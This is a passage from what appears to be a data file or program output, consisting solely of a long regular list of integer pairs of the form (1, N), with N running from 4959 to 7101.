4959), (1, 4960), (1, 4961), (1, 4962), (1, 4963), (1, 4964), (1, 4965), (1, 4966), (1, 4967), (1, 4968), (1, 4969), (1, 4970), (1, 4971), (1, 4972), (1, 4973), (1, 4974), (1, 4975), (1, 4976), (1, 4977), (1, 4978), (1, 4979), (1, 4980), (1, 4981), (1, 4982), (1, 4983), (1, 4984), (1, 4985), (1, 4986), (1, 4987), (1, 4988), (1, 4989), (1, 4990), (1, 4991), (1, 4992), (1, 4993), (1, 4994), (1, 4995), (1, 4996), (1, 4997), (1, 4998), (1, 4999), (1, 5000), (1, 5001), (1, 5002), (1, 5003), (1, 5004), (1, 5005), (1, 5006), (1, 5007), (1, 5008), (1, 5009), (1, 5010), (1, 5011), (1, 5012), (1, 5013), (1, 5014), (1, 5015), (1, 5016), (1, 5017), (1, 5018), (1, 5019), (1, 5020), (1, 5021), (1, 5022), (1, 5023), (1, 5024), (1, 5025), (1, 5026), (1, 5027), (1, 5028), (1, 5029), (1, 5030), (1, 5031), (1, 5032), (1, 5033), (1, 5034), (1, 5035), (1, 5036), (1, 5037), (1, 5038), (1, 5039), (1, 5040), (1, 5041), (1, 5042), (1, 5043), (1, 5044), (1, 5045), (1, 5046), (1, 5047), (1, 5048), (1, 5049), (1, 5050), (1, 5051), (1, 5052), (1, 5053), (1, 5054), (1, 5055), (1, 5056), (1, 5057), (1, 5058), (1, 5059), (1, 5060), (1, 5061), (1, 5062), (1, 5063), (1, 5064), (1, 5065), (1, 5066), (1, 5067), (1, 5068), (1, 5069), (1, 5070), (1, 5071), (1, 5072), (1, 5073), (1, 5074), (1, 5075), (1, 5076), (1, 5077), (1, 5078), (1, 5079), (1, 5080), (1, 5081), (1, 5082), (1, 5083), (1, 5084), (1, 5085), (1, 5086), (1, 5087), (1, 5088), (1, 5089), (1, 5090), (1, 5091), (1, 5092), (1, 5093), (1, 5094), (1, 5095), (1, 5096), (1, 5097), (1, 5098), (1, 5099), (1, 5100), (1, 5101), (1, 5102), (1, 5103), (1, 5104), (1, 5105), (1, 5106), (1, 5107), (1, 5108), (1, 5109), (1, 5110), (1, 5111), (1, 5112), (1, 5113), (1, 5114), (1, 5115), (1, 5116), (1, 5117), (1, 5118), (1, 5119), (1, 5120), (1, 5121), (1, 5122), (1, 5123), (1, 5124), (1, 5125), (1, 5126), (1, 5127), (1, 5128), (1, 5129), (1, 5130), (1, 5131), (1, 5132), (1, 5133), (1, 5134), (1, 5135), (1, 5136), (1, 5137), (1, 5138), (1, 5139), (1, 5140), (1, 5141), (1, 5142), (1, 5143), (1, 5144), (1, 5145), (1, 5146), (1, 5147), (1, 5148), (1, 5149), (1, 5150), (1, 5151), (1, 5152), (1, 5153), (1, 5154), (1, 5155), (1, 5156), (1, 5157), (1, 5158), (1, 5159), (1, 5160), (1, 5161), (1, 5162), (1, 5163), (1, 5164), (1, 5165), (1, 5166), (1, 5167), (1, 5168), (1, 5169), (1, 5170), (1, 5171), (1, 5172), (1, 5173), (1, 5174), (1, 5175), (1, 5176), (1, 5177), (1, 5178), (1, 5179), (1, 5180), (1, 5181), (1, 5182), (1, 5183), (1, 5184), (1, 5185), (1, 5186), (1, 5187), (1, 5188), (1, 5189), (1, 5190), (1, 5191), (1, 5192), (1, 5193), (1, 5194), (1, 5195), (1, 5196), (1, 5197), (1, 5198), (1, 5199), (1, 5200), (1, 5201), (1, 5202), (1, 5203), (1, 5204), (1, 5205), (1, 5206), (1, 5207), (1, 5208), (1, 5209), (1, 5210), (1, 5211), (1, 5212), (1, 5213), (1, 5214), (1, 5215), (1, 5216), (1, 5217), (1, 5218), (1, 5219), (1, 5220), (1, 5221), (1, 5222), (1, 5223), (1, 5224), (1, 5225), (1, 5226), (1, 5227), (1, 5228), (1, 5229), (1, 5230), (1, 5231), (1, 5232), (1, 5233), (1, 5234), (1, 5235), (1, 5236), (1, 5237), (1, 5238), (1, 5239), (1, 5240), (1, 5241), (1, 5242), (1, 5243), (1, 5244), (1, 5245), (1, 5246), (1, 5247), (1, 5248), (1, 5249), (1, 5250), (1, 5251), (1, 5252), (1, 5253), (1, 5254), (1, 5255), (1, 5256), (1, 5257), (1, 5258), (1, 5259), (1, 5260), (1, 5261), (1, 5262), (1, 5263), (1, 5264), (1, 5265), (1, 5266), (1, 5267), (1, 5268), (1, 5269), (1, 5270), (1, 5271), (1, 5272), (1, 5273), (1, 5274), (1, 5275), (1, 5276), (1, 5277), (1, 5278), (1, 5279), (1, 5280), (1, 5281), (1, 5282), (1, 5283), (1, 5284), (1, 5285), (1, 5286), (1, 5287), (1, 5288), (1, 5289), (1, 5290), (1, 5291), (1, 5292), (1, 5293), (1, 5294), (1, 5295), (1, 5296), (1, 5297), (1, 5298), (1, 5299), (1, 5300), (1, 5301), (1, 5302), (1, 5303), (1, 5304), (1, 5305), (1, 5306), (1, 5307), (1, 5308), (1, 5309), (1, 5310), (1, 5311), (1, 5312), (1, 5313), (1, 5314), (1, 5315), (1, 5316), (1, 5317), (1, 5318), (1, 5319), (1, 5320), (1, 5321), (1, 5322), (1, 5323), (1, 5324), (1, 5325), (1, 5326), (1, 5327), (1, 5328), (1, 5329), (1, 5330), (1, 5331), (1, 5332), (1, 5333), (1, 5334), (1, 5335), (1, 5336), (1, 5337), (1, 5338), (1, 5339), (1, 5340), (1, 5341), (1, 5342), (1, 5343), (1, 5344), (1, 5345), (1, 5346), (1, 5347), (1, 5348), (1, 5349), (1, 5350), (1, 5351), (1, 5352), (1, 5353), (1, 5354), (1, 5355), (1, 5356), (1, 5357), (1, 5358), (1, 5359), (1, 5360), (1, 5361), (1, 5362), (1, 5363), (1, 5364), (1, 5365), (1, 5366), (1, 5367), (1, 5368), (1, 5369), (1, 5370), (1, 5371), (1, 5372), (1, 5373), (1, 5374), (1, 5375), (1, 5376), (1, 5377), (1, 5378), (1, 5379), (1, 5380), (1, 5381), (1, 5382), (1, 5383), (1, 5384), (1, 5385), (1, 5386), (1, 5387), (1, 5388), (1, 5389), (1, 5390), (1, 5391), (1, 5392), (1, 5393), (1, 5394), (1, 5395), (1, 5396), (1, 5397), (1, 5398), (1, 5399), (1, 5400), (1, 5401), (1, 5402), (1, 5403), (1, 5404), (1, 5405), (1, 5406), (1, 5407), (1, 5408), (1, 5409), (1, 5410), (1, 5411), (1, 5412), (1, 5413), (1, 5414), (1, 5415), (1, 5416), (1, 5417), (1, 5418), (1, 5419), (1, 5420), (1, 5421), (1, 5422), (1, 5423), (1, 5424), (1, 5425), (1, 5426), (1, 5427), (1, 5428), (1, 5429), (1, 5430), (1, 5431), (1, 5432), (1, 5433), (1, 5434), (1, 5435), (1, 5436), (1, 5437), (1, 5438), (1, 5439), (1, 5440), (1, 5441), (1, 5442), (1, 5443), (1, 5444), (1, 5445), (1, 5446), (1, 5447), (1, 5448), (1, 5449), (1, 5450), (1, 5451), (1, 5452), (1, 5453), (1, 5454), (1, 5455), (1, 5456), (1, 5457), (1, 5458), (1, 5459), (1, 5460), (1, 5461), (1, 5462), (1, 5463), (1, 5464), (1, 5465), (1, 5466), (1, 5467), (1, 5468), (1, 5469), (1, 5470), (1, 5471), (1, 5472), (1, 5473), (1, 5474), (1, 5475), (1, 5476), (1, 5477), (1, 5478), (1, 5479), (1, 5480), (1, 5481), (1, 5482), (1, 5483), (1, 5484), (1, 5485), (1, 5486), (1, 5487), (1, 5488), (1, 5489), (1, 5490), (1, 5491), (1, 5492), (1, 5493), (1, 5494), (1, 5495), (1, 5496), (1, 5497), (1, 5498), (1, 5499), (1, 5500), (1, 5501), (1, 5502), (1, 5503), (1, 5504), (1, 5505), (1, 5506), (1, 5507), (1, 5508), (1, 5509), (1, 5510), (1, 5511), (1, 5512), (1, 5513), (1, 5514), (1, 5515), (1, 5516), (1, 5517), (1, 5518), (1, 5519), (1, 5520), (1, 5521), (1, 5522), (1, 5523), (1, 5524), (1, 5525), (1, 5526), (1, 5527), (1, 5528), (1, 5529), (1, 5530), (1, 5531), (1, 5532), (1, 5533), (1, 5534), (1, 5535), (1, 5536), (1, 5537), (1, 5538), (1, 5539), (1, 5540), (1, 5541), (1, 5542), (1, 5543), (1, 5544), (1, 5545), (1, 5546), (1, 5547), (1, 5548), (1, 5549), (1, 5550), (1, 5551), (1, 5552), (1, 5553), (1, 5554), (1, 5555), (1, 5556), (1, 5557), (1, 5558), (1, 5559), (1, 5560), (1, 5561), (1, 5562), (1, 5563), (1, 5564), (1, 5565), (1, 5566), (1, 5567), (1, 5568), (1, 5569), (1, 5570), (1, 5571), (1, 5572), (1, 5573), (1, 5574), (1, 5575), (1, 5576), (1, 5577), (1, 5578), (1, 5579), (1, 5580), (1, 5581), (1, 5582), (1, 5583), (1, 5584), (1, 5585), (1, 5586), (1, 5587), (1, 5588), (1, 5589), (1, 5590), (1, 5591), (1, 5592), (1, 5593), (1, 5594), (1, 5595), (1, 5596), (1, 5597), (1, 5598), (1, 5599), (1, 5600), (1, 5601), (1, 5602), (1, 5603), (1, 5604), (1, 5605), (1, 5606), (1, 5607), (1, 5608), (1, 5609), (1, 5610), (1, 5611), (1, 5612), (1, 5613), (1, 5614), (1, 5615), (1, 5616), (1, 5617), (1, 5618), (1, 5619), (1, 5620), (1, 5621), (1, 5622), (1, 5623), (1, 5624), (1, 5625), (1, 5626), (1, 5627), (1, 5628), (1, 5629), (1, 5630), (1, 5631), (1, 5632), (1, 5633), (1, 5634), (1, 5635), (1, 5636), (1, 5637), (1, 5638), (1, 5639), (1, 5640), (1, 5641), (1, 5642), (1, 5643), (1, 5644), (1, 5645), (1, 5646), (1, 5647), (1, 5648), (1, 5649), (1, 5650), (1, 5651), (1, 5652), (1, 5653), (1, 5654), (1, 5655), (1, 5656), (1, 5657), (1, 5658), (1, 5659), (1, 5660), (1, 5661), (1, 5662), (1, 5663), (1, 5664), (1, 5665), (1, 5666), (1, 5667), (1, 5668), (1, 5669), (1, 5670), (1, 5671), (1, 5672), (1, 5673), (1, 5674), (1, 5675), (1, 5676), (1, 5677), (1, 5678), (1, 5679), (1, 5680), (1, 5681), (1, 5682), (1, 5683), (1, 5684), (1, 5685), (1, 5686), (1, 5687), (1, 5688), (1, 5689), (1, 5690), (1, 5691), (1, 5692), (1, 5693), (1, 5694), (1, 5695), (1, 5696), (1, 5697), (1, 5698), (1, 5699), (1, 5700), (1, 5701), (1, 5702), (1, 5703), (1, 5704), (1, 5705), (1, 5706), (1, 5707), (1, 5708), (1, 5709), (1, 5710), (1, 5711), (1, 5712), (1, 5713), (1, 5714), (1, 5715), (1, 5716), (1, 5717), (1, 5718), (1, 5719), (1, 5720), (1, 5721), (1, 5722), (1, 5723), (1, 5724), (1, 5725), (1, 5726), (1, 5727), (1, 5728), (1, 5729), (1, 5730), (1, 5731), (1, 5732), (1, 5733), (1, 5734), (1, 5735), (1, 5736), (1, 5737), (1, 5738), (1, 5739), (1, 5740), (1, 5741), (1, 5742), (1, 5743), (1, 5744), (1, 5745), (1, 5746), (1, 5747), (1, 5748), (1, 5749), (1, 5750), (1, 5751), (1, 5752), (1, 5753), (1, 5754), (1, 5755), (1, 5756), (1, 5757), (1, 5758), (1, 5759), (1, 5760), (1, 5761), (1, 5762), (1, 5763), (1, 5764), (1, 5765), (1, 5766), (1, 5767), (1, 5768), (1, 5769), (1, 5770), (1, 5771), (1, 5772), (1, 5773), (1, 5774), (1, 5775), (1, 5776), (1, 5777), (1, 5778), (1, 5779), (1, 5780), (1, 5781), (1, 5782), (1, 5783), (1, 5784), (1, 5785), (1, 5786), (1, 5787), (1, 5788), (1, 5789), (1, 5790), (1, 5791), (1, 5792), (1, 5793), (1, 5794), (1, 5795), (1, 5796), (1, 5797), (1, 5798), (1, 5799), (1, 5800), (1, 5801), (1, 5802), (1, 5803), (1, 5804), (1, 5805), (1, 5806), (1, 5807), (1, 5808), (1, 5809), (1, 5810), (1, 5811), (1, 5812), (1, 5813), (1, 5814), (1, 5815), (1, 5816), (1, 5817), (1, 5818), (1, 5819), (1, 5820), (1, 5821), (1, 5822), (1, 5823), (1, 5824), (1, 5825), (1, 5826), (1, 5827), (1, 5828), (1, 5829), (1, 5830), (1, 5831), (1, 5832), (1, 5833), (1, 5834), (1, 5835), (1, 5836), (1, 5837), (1, 5838), (1, 5839), (1, 5840), (1, 5841), (1, 5842), (1, 5843), (1, 5844), (1, 5845), (1, 5846), (1, 5847), (1, 5848), (1, 5849), (1, 5850), (1, 5851), (1, 5852), (1, 5853), (1, 5854), (1, 5855), (1, 5856), (1, 5857), (1, 5858), (1, 5859), (1, 5860), (1, 5861), (1, 5862), (1, 5863), (1, 5864), (1, 5865), (1, 5866), (1, 5867), (1, 5868), (1, 5869), (1, 5870), (1, 5871), (1, 5872), (1, 5873), (1, 5874), (1, 5875), (1, 5876), (1, 5877), (1, 5878), (1, 5879), (1, 5880), (1, 5881), (1, 5882), (1, 5883), (1, 5884), (1, 5885), (1, 5886), (1, 5887), (1, 5888), (1, 5889), (1, 5890), (1, 5891), (1, 5892), (1, 5893), (1, 5894), (1, 5895), (1, 5896), (1, 5897), (1, 5898), (1, 5899), (1, 5900), (1, 5901), (1, 5902), (1, 5903), (1, 5904), (1, 5905), (1, 5906), (1, 5907), (1, 5908), (1, 5909), (1, 5910), (1, 5911), (1, 5912), (1, 5913), (1, 5914), (1, 5915), (1, 5916), (1, 5917), (1, 5918), (1, 5919), (1, 5920), (1, 5921), (1, 5922), (1, 5923), (1, 5924), (1, 5925), (1, 5926), (1, 5927), (1, 5928), (1, 5929), (1, 5930), (1, 5931), (1, 5932), (1, 5933), (1, 5934), (1, 5935), (1, 5936), (1, 5937), (1, 5938), (1, 5939), (1, 5940), (1, 5941), (1, 5942), (1, 5943), (1, 5944), (1, 5945), (1, 5946), (1, 5947), (1, 5948), (1, 5949), (1, 5950), (1, 5951), (1, 5952), (1, 5953), (1, 5954), (1, 5955), (1, 5956), (1, 5957), (1, 5958), (1, 5959), (1, 5960), (1, 5961), (1, 5962), (1, 5963), (1, 5964), (1, 5965), (1, 5966), (1, 5967), (1, 5968), (1, 5969), (1, 5970), (1, 5971), (1, 5972), (1, 5973), (1, 5974), (1, 5975), (1, 5976), (1, 5977), (1, 5978), (1, 5979), (1, 5980), (1, 5981), (1, 5982), (1, 5983), (1, 5984), (1, 5985), (1, 5986), (1, 5987), (1, 5988), (1, 5989), (1, 5990), (1, 5991), (1, 5992), (1, 5993), (1, 5994), (1, 5995), (1, 5996), (1, 5997), (1, 5998), (1, 5999), (1, 6000), (1, 6001), (1, 6002), (1, 6003), (1, 6004), (1, 6005), (1, 6006), (1, 6007), (1, 6008), (1, 6009), (1, 6010), (1, 6011), (1, 6012), (1, 6013), (1, 6014), (1, 6015), (1, 6016), (1, 6017), (1, 6018), (1, 6019), (1, 6020), (1, 6021), (1, 6022), (1, 6023), (1, 6024), (1, 6025), (1, 6026), (1, 6027), (1, 6028), (1, 6029), (1, 6030), (1, 6031), (1, 6032), (1, 6033), (1, 6034), (1, 6035), (1, 6036), (1, 6037), (1, 6038), (1, 6039), (1, 6040), (1, 6041), (1, 6042), (1, 6043), (1, 6044), (1, 6045), (1, 6046), (1, 6047), (1, 6048), (1, 6049), (1, 6050), (1, 6051), (1, 6052), (1, 6053), (1, 6054), (1, 6055), (1, 6056), (1, 6057), (1, 6058), (1, 6059), (1, 6060), (1, 6061), (1, 6062), (1, 6063), (1, 6064), (1, 6065), (1, 6066), (1, 6067), (1, 6068), (1, 6069), (1, 6070), (1, 6071), (1, 6072), (1, 6073), (1, 6074), (1, 6075), (1, 6076), (1, 6077), (1, 6078), (1, 6079), (1, 6080), (1, 6081), (1, 6082), (1, 6083), (1, 6084), (1, 6085), (1, 6086), (1, 6087), (1, 6088), (1, 6089), (1, 6090), (1, 6091), (1, 6092), (1, 6093), (1, 6094), (1, 6095), (1, 6096), (1, 6097), (1, 6098), (1, 6099), (1, 6100), (1, 6101), (1, 6102), (1, 6103), (1, 6104), (1, 6105), (1, 6106), (1, 6107), (1, 6108), (1, 6109), (1, 6110), (1, 6111), (1, 6112), (1, 6113), (1, 6114), (1, 6115), (1, 6116), (1, 6117), (1, 6118), (1, 6119), (1, 6120), (1, 6121), (1, 6122), (1, 6123), (1, 6124), (1, 6125), (1, 6126), (1, 6127), (1, 6128), (1, 6129), (1, 6130), (1, 6131), (1, 6132), (1, 6133), (1, 6134), (1, 6135), (1, 6136), (1, 6137), (1, 6138), (1, 6139), (1, 6140), (1, 6141), (1, 6142), (1, 6143), (1, 6144), (1, 6145), (1, 6146), (1, 6147), (1, 6148), (1, 6149), (1, 6150), (1, 6151), (1, 6152), (1, 6153), (1, 6154), (1, 6155), (1, 6156), (1, 6157), (1, 6158), (1, 6159), (1, 6160), (1, 6161), (1, 6162), (1, 6163), (1, 6164), (1, 6165), (1, 6166), (1, 6167), (1, 6168), (1, 6169), (1, 6170), (1, 6171), (1, 6172), (1, 6173), (1, 6174), (1, 6175), (1, 6176), (1, 6177), (1, 6178), (1, 6179), (1, 6180), (1, 6181), (1, 6182), (1, 6183), (1, 6184), (1, 6185), (1, 6186), (1, 6187), (1, 6188), (1, 6189), (1, 6190), (1, 6191), (1, 6192), (1, 6193), (1, 6194), (1, 6195), (1, 6196), (1, 6197), (1, 6198), (1, 6199), (1, 6200), (1, 6201), (1, 6202), (1, 6203), (1, 6204), (1, 6205), (1, 6206), (1, 6207), (1, 6208), (1, 6209), (1, 6210), (1, 6211), (1, 6212), (1, 6213), (1, 6214), (1, 6215), (1, 6216), (1, 6217), (1, 6218), (1, 6219), (1, 6220), (1, 6221), (1, 6222), (1, 6223), (1, 6224), (1, 6225), (1, 6226), (1, 6227), (1, 6228), (1, 6229), (1, 6230), (1, 6231), (1, 6232), (1, 6233), (1, 6234), (1, 6235), (1, 6236), (1, 6237), (1, 6238), (1, 6239), (1, 6240), (1, 6241), (1, 6242), (1, 6243), (1, 6244), (1, 6245), (1, 6246), (1, 6247), (1, 6248), (1, 6249), (1, 6250), (1, 6251), (1, 6252), (1, 6253), (1, 6254), (1, 6255), (1, 6256), (1, 6257), (1, 6258), (1, 6259), (1, 6260), (1, 6261), (1, 6262), (1, 6263), (1, 6264), (1, 6265), (1, 6266), (1, 6267), (1, 6268), (1, 6269), (1, 6270), (1, 6271), (1, 6272), (1, 6273), (1, 6274), (1, 6275), (1, 6276), (1, 6277), (1, 6278), (1, 6279), (1, 6280), (1, 6281), (1, 6282), (1, 6283), (1, 6284), (1, 6285), (1, 6286), (1, 6287), (1, 6288), (1, 6289), (1, 6290), (1, 6291), (1, 6292), (1, 6293), (1, 6294), (1, 6295), (1, 6296), (1, 6297), (1, 6298), (1, 6299), (1, 6300), (1, 6301), (1, 6302), (1, 6303), (1, 6304), (1, 6305), (1, 6306), (1, 6307), (1, 6308), (1, 6309), (1, 6310), (1, 6311), (1, 6312), (1, 6313), (1, 6314), (1, 6315), (1, 6316), (1, 6317), (1, 6318), (1, 6319), (1, 6320), (1, 6321), (1, 6322), (1, 6323), (1, 6324), (1, 6325), (1, 6326), (1, 6327), (1, 6328), (1, 6329), (1, 6330), (1, 6331), (1, 6332), (1, 6333), (1, 6334), (1, 6335), (1, 6336), (1, 6337), (1, 6338), (1, 6339), (1, 6340), (1, 6341), (1, 6342), (1, 6343), (1, 6344), (1, 6345), (1, 6346), (1, 6347), (1, 6348), (1, 6349), (1, 6350), (1, 6351), (1, 6352), (1, 6353), (1, 6354), (1, 6355), (1, 6356), (1, 6357), (1, 6358), (1, 6359), (1, 6360), (1, 6361), (1, 6362), (1, 6363), (1, 6364), (1, 6365), (1, 6366), (1, 6367), (1, 6368), (1, 6369), (1, 6370), (1, 6371), (1, 6372), (1, 6373), (1, 6374), (1, 6375), (1, 6376), (1, 6377), (1, 6378), (1, 6379), (1, 6380), (1, 6381), (1, 6382), (1, 6383), (1, 6384), (1, 6385), (1, 6386), (1, 6387), (1, 6388), (1, 6389), (1, 6390), (1, 6391), (1, 6392), (1, 6393), (1, 6394), (1, 6395), (1, 6396), (1, 6397), (1, 6398), (1, 6399), (1, 6400), (1, 6401), (1, 6402), (1, 6403), (1, 6404), (1, 6405), (1, 6406), (1, 6407), (1, 6408), (1, 6409), (1, 6410), (1, 6411), (1, 6412), (1, 6413), (1, 6414), (1, 6415), (1, 6416), (1, 6417), (1, 6418), (1, 6419), (1, 6420), (1, 6421), (1, 6422), (1, 6423), (1, 6424), (1, 6425), (1, 6426), (1, 6427), (1, 6428), (1, 6429), (1, 6430), (1, 6431), (1, 6432), (1, 6433), (1, 6434), (1, 6435), (1, 6436), (1, 6437), (1, 6438), (1, 6439), (1, 6440), (1, 6441), (1, 6442), (1, 6443), (1, 6444), (1, 6445), (1, 6446), (1, 6447), (1, 6448), (1, 6449), (1, 6450), (1, 6451), (1, 6452), (1, 6453), (1, 6454), (1, 6455), (1, 6456), (1, 6457), (1, 6458), (1, 6459), (1, 6460), (1, 6461), (1, 6462), (1, 6463), (1, 6464), (1, 6465), (1, 6466), (1, 6467), (1, 6468), (1, 6469), (1, 6470), (1, 6471), (1, 6472), (1, 6473), (1, 6474), (1, 6475), (1, 6476), (1, 6477), (1, 6478), (1, 6479), (1, 6480), (1, 6481), (1, 6482), (1, 6483), (1, 6484), (1, 6485), (1, 6486), (1, 6487), (1, 6488), (1, 6489), (1, 6490), (1, 6491), (1, 6492), (1, 6493), (1, 6494), (1, 6495), (1, 6496), (1, 6497), (1, 6498), (1, 6499), (1, 6500), (1, 6501), (1, 6502), (1, 6503), (1, 6504), (1, 6505), (1, 6506), (1, 6507), (1, 6508), (1, 6509), (1, 6510), (1, 6511), (1, 6512), (1, 6513), (1, 6514), (1, 6515), (1, 6516), (1, 6517), (1, 6518), (1, 6519), (1, 6520), (1, 6521), (1, 6522), (1, 6523), (1, 6524), (1, 6525), (1, 6526), (1, 6527), (1, 6528), (1, 6529), (1, 6530), (1, 6531), (1, 6532), (1, 6533), (1, 6534), (1, 6535), (1, 6536), (1, 6537), (1, 6538), (1, 6539), (1, 6540), (1, 6541), (1, 6542), (1, 6543), (1, 6544), (1, 6545), (1, 6546), (1, 6547), (1, 6548), (1, 6549), (1, 6550), (1, 6551), (1, 6552), (1, 6553), (1, 6554), (1, 6555), (1, 6556), (1, 6557), (1, 6558), (1, 6559), (1, 6560), (1, 6561), (1, 6562), (1, 6563), (1, 6564), (1, 6565), (1, 6566), (1, 6567), (1, 6568), (1, 6569), (1, 6570), (1, 6571), (1, 6572), (1, 6573), (1, 6574), (1, 6575), (1, 6576), (1, 6577), (1, 6578), (1, 6579), (1, 6580), (1, 6581), (1, 6582), (1, 6583), (1, 6584), (1, 6585), (1, 6586), (1, 6587), (1, 6588), (1, 6589), (1, 6590), (1, 6591), (1, 6592), (1, 6593), (1, 6594), (1, 6595), (1, 6596), (1, 6597), (1, 6598), (1, 6599), (1, 6600), (1, 6601), (1, 6602), (1, 6603), (1, 6604), (1, 6605), (1, 6606), (1, 6607), (1, 6608), (1, 6609), (1, 6610), (1, 6611), (1, 6612), (1, 6613), (1, 6614), (1, 6615), (1, 6616), (1, 6617), (1, 6618), (1, 6619), (1, 6620), (1, 6621), (1, 6622), (1, 6623), (1, 6624), (1, 6625), (1, 6626), (1, 6627), (1, 6628), (1, 6629), (1, 6630), (1, 6631), (1, 6632), (1, 6633), (1, 6634), (1, 6635), (1, 6636), (1, 6637), (1, 6638), (1, 6639), (1, 6640), (1, 6641), (1, 6642), (1, 6643), (1, 6644), (1, 6645), (1, 6646), (1, 6647), (1, 6648), (1, 6649), (1, 6650), (1, 6651), (1, 6652), (1, 6653), (1, 6654), (1, 6655), (1, 6656), (1, 6657), (1, 6658), (1, 6659), (1, 6660), (1, 6661), (1, 6662), (1, 6663), (1, 6664), (1, 6665), (1, 6666), (1, 6667), (1, 6668), (1, 6669), (1, 6670), (1, 6671), (1, 6672), (1, 6673), (1, 6674), (1, 6675), (1, 6676), (1, 6677), (1, 6678), (1, 6679), (1, 6680), (1, 6681), (1, 6682), (1, 6683), (1, 6684), (1, 6685), (1, 6686), (1, 6687), (1, 6688), (1, 6689), (1, 6690), (1, 6691), (1, 6692), (1, 6693), (1, 6694), (1, 6695), (1, 6696), (1, 6697), (1, 6698), (1, 6699), (1, 6700), (1, 6701), (1, 6702), (1, 6703), (1, 6704), (1, 6705), (1, 6706), (1, 6707), (1, 6708), (1, 6709), (1, 6710), (1, 6711), (1, 6712), (1, 6713), (1, 6714), (1, 6715), (1, 6716), (1, 6717), (1, 6718), (1, 6719), (1, 6720), (1, 6721), (1, 6722), (1, 6723), (1, 6724), (1, 6725), (1, 6726), (1, 6727), (1, 6728), (1, 6729), (1, 6730), (1, 6731), (1, 6732), (1, 6733), (1, 6734), (1, 6735), (1, 6736), (1, 6737), (1, 6738), (1, 6739), (1, 6740), (1, 6741), (1, 6742), (1, 6743), (1, 6744), (1, 6745), (1, 6746), (1, 6747), (1, 6748), (1, 6749), (1, 6750), (1, 6751), (1, 6752), (1, 6753), (1, 6754), (1, 6755), (1, 6756), (1, 6757), (1, 6758), (1, 6759), (1, 6760), (1, 6761), (1, 6762), (1, 6763), (1, 6764), (1, 6765), (1, 6766), (1, 6767), (1, 6768), (1, 6769), (1, 6770), (1, 6771), (1, 6772), (1, 6773), (1, 6774), (1, 6775), (1, 6776), (1, 6777), (1, 6778), (1, 6779), (1, 6780), (1, 6781), (1, 6782), (1, 6783), (1, 6784), (1, 6785), (1, 6786), (1, 6787), (1, 6788), (1, 6789), (1, 6790), (1, 6791), (1, 6792), (1, 6793), (1, 6794), (1, 6795), (1, 6796), (1, 6797), (1, 6798), (1, 6799), (1, 6800), (1, 6801), (1, 6802), (1, 6803), (1, 6804), (1, 6805), (1, 6806), (1, 6807), (1, 6808), (1, 6809), (1, 6810), (1, 6811), (1, 6812), (1, 6813), (1, 6814), (1, 6815), (1, 6816), (1, 6817), (1, 6818), (1, 6819), (1, 6820), (1, 6821), (1, 6822), (1, 6823), (1, 6824), (1, 6825), (1, 6826), (1, 6827), (1, 6828), (1, 6829), (1, 6830), (1, 6831), (1, 6832), (1, 6833), (1, 6834), (1, 6835), (1, 6836), (1, 6837), (1, 6838), (1, 6839), (1, 6840), (1, 6841), (1, 6842), (1, 6843), (1, 6844), (1, 6845), (1, 6846), (1, 6847), (1, 6848), (1, 6849), (1, 6850), (1, 6851), (1, 6852), (1, 6853), (1, 6854), (1, 6855), (1, 6856), (1, 6857), (1, 6858), (1, 6859), (1, 6860), (1, 6861), (1, 6862), (1, 6863), (1, 6864), (1, 6865), (1, 6866), (1, 6867), (1, 6868), (1, 6869), (1, 6870), (1, 6871), (1, 6872), (1, 6873), (1, 6874), (1, 6875), (1, 6876), (1, 6877), (1, 6878), (1, 6879), (1, 6880), (1, 6881), (1, 6882), (1, 6883), (1, 6884), (1, 6885), (1, 6886), (1, 6887), (1, 6888), (1, 6889), (1, 6890), (1, 6891), (1, 6892), (1, 6893), (1, 6894), (1, 6895), (1, 6896), (1, 6897), (1, 6898), (1, 6899), (1, 6900), (1, 6901), (1, 6902), (1, 6903), (1, 6904), (1, 6905), (1, 6906), (1, 6907), (1, 6908), (1, 6909), (1, 6910), (1, 6911), (1, 6912), (1, 6913), (1, 6914), (1, 6915), (1, 6916), (1, 6917), (1, 6918), (1, 6919), (1, 6920), (1, 6921), (1, 6922), (1, 6923), (1, 6924), (1, 6925), (1, 6926), (1, 6927), (1, 6928), (1, 6929), (1, 6930), (1, 6931), (1, 6932), (1, 6933), (1, 6934), (1, 6935), (1, 6936), (1, 6937), (1, 6938), (1, 6939), (1, 6940), (1, 6941), (1, 6942), (1, 6943), (1, 6944), (1, 6945), (1, 6946), (1, 6947), (1, 6948), (1, 6949), (1, 6950), (1, 6951), (1, 6952), (1, 6953), (1, 6954), (1, 6955), (1, 6956), (1, 6957), (1, 6958), (1, 6959), (1, 6960), (1, 6961), (1, 6962), (1, 6963), (1, 6964), (1, 6965), (1, 6966), (1, 6967), (1, 6968), (1, 6969), (1, 6970), (1, 6971), (1, 6972), (1, 6973), (1, 6974), (1, 6975), (1, 6976), (1, 6977), (1, 6978), (1, 6979), (1, 6980), (1, 6981), (1, 6982), (1, 6983), (1, 6984), (1, 6985), (1, 6986), (1, 6987), (1, 6988), (1, 6989), (1, 6990), (1, 6991), (1, 6992), (1, 6993), (1, 6994), (1, 6995), (1, 6996), (1, 6997), (1, 6998), (1, 6999), (1, 7000), (1, 7001), (1, 7002), (1, 7003), (1, 7004), (1, 7005), (1, 7006), (1, 7007), (1, 7008), (1, 7009), (1, 7010), (1, 7011), (1, 7012), (1, 7013), (1, 7014), (1, 7015), (1, 7016), (1, 7017), (1, 7018), (1, 7019), (1, 7020), (1, 7021), (1, 7022), (1, 7023), (1, 7024), (1, 7025), (1, 7026), (1, 7027), (1, 7028), (1, 7029), (1, 7030), (1, 7031), (1, 7032), (1, 7033), (1, 7034), (1, 7035), (1, 7036), (1, 7037), (1, 7038), (1, 7039), (1, 7040), (1, 7041), (1, 7042), (1, 7043), (1, 7044), (1, 7045), (1, 7046), (1, 7047), (1, 7048), (1, 7049), (1, 7050), (1, 7051), (1, 7052), (1, 7053), (1, 7054), (1, 7055), (1, 7056), (1, 7057), (1, 7058), (1, 7059), (1, 7060), (1, 7061), (1, 7062), (1, 7063), (1, 7064), (1, 7065), (1, 7066), (1, 7067), (1, 7068), (1, 7069), (1, 7070), (1, 7071), (1, 7072), (1, 7073), (1, 7074), (1, 7075), (1, 7076), (1, 7077), (1, 7078), (1, 7079), (1, 7080), (1, 7081), (1, 7082), (1, 7083), (1, 7084), (1, 7085), (1, 7086), (1, 7087), (1, 7088), (1, 7089), (1, 7090), (1, 7091), (1, 7092), (1, 7093), (1, 7094), (1, 7095), (1, 7096), (1, 7097), (1, 7098), (1, 7099), (1, 7100), (1, 7101), 